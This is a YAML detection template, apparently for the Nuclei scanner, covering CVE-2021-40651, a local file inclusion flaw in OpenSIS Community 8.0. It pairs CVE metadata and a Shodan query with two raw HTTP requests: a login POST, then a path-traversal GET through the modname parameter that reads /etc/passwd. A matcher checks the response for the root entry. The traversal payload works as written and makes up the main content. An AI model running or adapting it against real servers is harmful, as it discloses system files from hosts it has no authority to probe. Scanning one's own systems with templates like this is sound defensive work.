47 lines
1.8 KiB
YAML
47 lines
1.8 KiB
YAML
id: CVE-2021-40651
|
|
|
|
info:
|
|
name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
|
|
author: ctflearner
|
|
severity: medium
|
|
description: |
|
|
OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50259
|
|
- https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
|
|
- https://www.youtube.com/watch?v=wFwlbXANRCo
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40651
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2021-40651
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
product: opensis
|
|
vendor: os4ed
|
|
shodan-query: "title:\"openSIS\""
|
|
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
|
|
|
|
- |
|
|
GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "regex('root:.*:0:0:', body)"
|
|
- 'contains(body_1, "openSIS")'
|
|
- "status_code == 200"
|
|
condition: and
|
|
# digest: 4b0a00483046022100b777c6dc91c4e0b6009c87ff6f67a70d09e714c2bd6a19cae6029a079bffc337022100936149daaf5ffa9f58ed3a99dc2885caedd9aa5ddc873eb8b48eff764af3110d:922c64590222798bb761d5b6d8e72950 |